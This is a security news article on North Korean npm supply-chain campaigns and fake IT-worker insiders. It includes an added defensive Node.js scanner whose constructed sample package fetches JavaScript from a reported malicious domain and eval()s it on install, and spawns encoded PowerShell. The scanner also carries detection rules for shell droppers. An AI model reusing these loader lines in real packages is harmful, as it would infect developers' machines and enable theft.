Hackers from North Korea Use Malicious npm Packages to Target Developers


Threat actors linked to North Korea have been observed uploading a number of malicious packages to the npm registry, which point to “coordinated and relentless” attempts to infect developers.

The campaign, which aims to infect developers with malware and steal cryptocurrency assets, is the subject of a report from software supply chain security company Phylum. The most recent wave, observed between August 12 and August 27, 2024, included the packages temp-etherscan-api, etherscan-api, telegram-con, helmet-validate, and qq-console. Phylum stated, “We believe that qq-console is related to the North Korean campaign known as ‘Contagious Interview.’”

Contagious Interview is a persistent campaign that infects software developers with information-stealing malware by tricking them into downloading fake installers for video conferencing applications such as MiroTalk, hosted on fake websites or delivered through malicious npm packages. The ultimate objective is to run a Python payload called InvisibleFerret, which can exfiltrate sensitive data from browser extensions for cryptocurrency wallets and establish persistence on the host by abusing legitimate remote desktop software such as AnyDesk. CrowdStrike tracks the activity under the name Famous Chollima.

The recently discovered helmet-validate package takes a different approach: it embeds a file, config.js, that calls eval() on JavaScript retrieved from a remote domain (“ipcheck[.]cloud”), so the malicious logic is fetched at run time rather than shipped in the published package, where a reviewer would see it. According to Phylum, “our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online,” suggesting a connection between the two sets of attacks. The company also reported another package, sass-notification, uploaded on August 27, 2024, that resembled previously identified npm libraries such as call-blockflow. Those packages have been attributed to Moonstone Sleet, a different North Korean threat group.
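As an added example (not code from the article, from Phylum, or from any of the packages named here), the following Node.js script performs an offline static triage of an unpacked npm package for the two behaviours described in this paragraph and the next: a lifecycle script that eval()s JavaScript fetched from a remote host, and obfuscated code that launches PowerShell or batch droppers through child_process. The sample package contents, file names and rule thresholds are constructed for illustration; the only real indicators are the ipcheck[.]cloud and mirotalk[.]net domains and the 167.88.36.13 address quoted above. Nothing in the sample is executed or contacted; the files are only pattern-matched.

```javascript
// Added example: offline static triage of an unpacked npm package.
// Not the article's, Phylum's, or any real package's code. The sample
// package below is CONSTRUCTED and inert; it is only pattern-matched.

// Indicators quoted in the article. Everything else in this file is an assumption.
const IOC_HOSTS = ["ipcheck.cloud", "mirotalk.net"];
const IOC_IPS = ["167.88.36.13"];

// Heuristic rules. Each returns true when a source file shows the pattern.
const RULES = [
  {
    id: "remote-eval",
    desc: "eval()/new Function() in the same file as an HTTP fetch (code loaded at run time)",
    test: (src) =>
      /\b(eval|Function)\s*\(/.test(src) &&
      /\b(https?\.get|fetch|axios|request)\s*\(/.test(src),
  },
  {
    id: "shell-dropper",
    desc: "child_process used to launch powershell/cmd or a .bat file",
    test: (src) => /child_process/.test(src) && /powershell|\bcmd(\.exe)?\b|\.bat\b/i.test(src),
  },
  {
    id: "ioc-host",
    desc: "reference to a host or IP reported for this campaign",
    test: (src) => [...IOC_HOSTS, ...IOC_IPS].some((ioc) => src.includes(ioc)),
  },
  {
    id: "obfuscation",
    desc: "long \\x escape runs or a base64-looking blob of 120+ characters",
    test: (src) => /(\\x[0-9a-f]{2}){8,}/i.test(src) || /[A-Za-z0-9+/]{120,}={0,2}/.test(src),
  },
];

// files: { "relative/path": "contents" } as produced by unpacking the tarball.
// Returns one finding per (file, rule) hit; an empty array means nothing was flagged.
function scanPackage(files) {
  const findings = [];
  // Lifecycle hooks run automatically on `npm install`, so they are the entry point
  // an attacker needs; record them before looking at the code they invoke.
  const manifest = files["package.json"] ? JSON.parse(files["package.json"]) : {};
  for (const hook of ["preinstall", "install", "postinstall", "prepare"]) {
    if (manifest.scripts && manifest.scripts[hook]) {
      findings.push({ file: "package.json", rule: "lifecycle-hook", detail: `${hook}: ${manifest.scripts[hook]}` });
    }
  }
  for (const [name, src] of Object.entries(files)) {
    if (!name.endsWith(".js")) continue;
    for (const rule of RULES) {
      if (rule.test(src)) findings.push({ file: name, rule: rule.id, detail: rule.desc });
    }
  }
  return findings;
}

// Constructed sample mirroring the described behaviour: postinstall runs config.js,
// which fetches a script from an IOC host and eval()s it; util.js spawns an
// encoded PowerShell command. The host is never contacted because nothing here runs.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({ name: "example-validate", version: "1.0.0", scripts: { postinstall: "node config.js" } }),
  "config.js": [
    'const https = require("https");',
    'https.get("https://ipcheck.cloud/x", (res) => {',
    '  let body = ""; res.on("data", (c) => (body += c)); res.on("end", () => eval(body));',
    "});",
  ].join("\n"),
  "index.js": "module.exports = function validate(o) { return !!o; };",
  "util.js": [
    'const { spawn } = require("child_process");',
    `spawn("powershell", ["-enc", "${"QQ".repeat(70)}"]);`,
  ].join("\n"),
};

// Constructed benign control package: no hooks, no network, no shell.
const BENIGN_PACKAGE = {
  "package.json": JSON.stringify({ name: "padder", version: "1.0.0" }),
  "index.js": "module.exports = (s, n) => String(s).padStart(n);",
};

for (const f of scanPackage(SAMPLE_PACKAGE)) console.log(`${f.file}\t${f.rule}\t${f.detail}`);
console.log(`benign findings: ${scanPackage(BENIGN_PACKAGE).length}`);
```

Each rule on its own is noisy (plenty of legitimate packages use child_process, and base64 blobs appear in bundled assets), so the useful signal is the combination: a lifecycle hook whose target file both fetches and eval()s, or a file that spawns PowerShell with an encoded argument. Run the scan against the unpacked tarball (`npm pack` then extract), not against the repository, since the published artefact is what npm install actually runs.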

The defining feature of these attacks, Phylum said, is the use of obfuscated JavaScript to write and run PowerShell and batch scripts. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.”

Famous Chollima Poses as IT Employees in American Companies

The disclosure coincides with CrowdStrike’s linking of Famous Chollima (formerly tracked as BadClone) to insider threat operations, in which operatives gain access to corporate environments by posing as employees.

According to the firm, Famous Chollima carried out these operations by securing contract work or full-time employment, evading background checks with stolen or forged identity documents. “When applying for a job, these malicious insiders submitted a résumé typically listing previous employment with a prominent company as well as additional lesser-known companies and no employment gaps.” Although the primary motivation is financial gain, some cases are alleged to have involved the exfiltration of sensitive data. CrowdStrike says that over the past year it has identified the threat actors applying to, or currently employed by, more than 100 distinct companies, most of them in the United States, Saudi Arabia, France, the Philippines, and Ukraine.

Technology, fintech, financial services, professional services, retail, manufacturing, insurance, pharmaceutical, social media, and media are among the most heavily targeted sectors. “After obtaining employee-level access to victim networks, the insiders performed minimal tasks related to their job role,” the company continued. “The insiders occasionally also tried to exfiltrate data via OneDrive, SharePoint, and Git. The RMM tools RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop were also installed by the insiders. Then, by using these RMM tools in conjunction with the company’s network credentials, the insiders were able to connect many IP addresses to the victim’s system.”
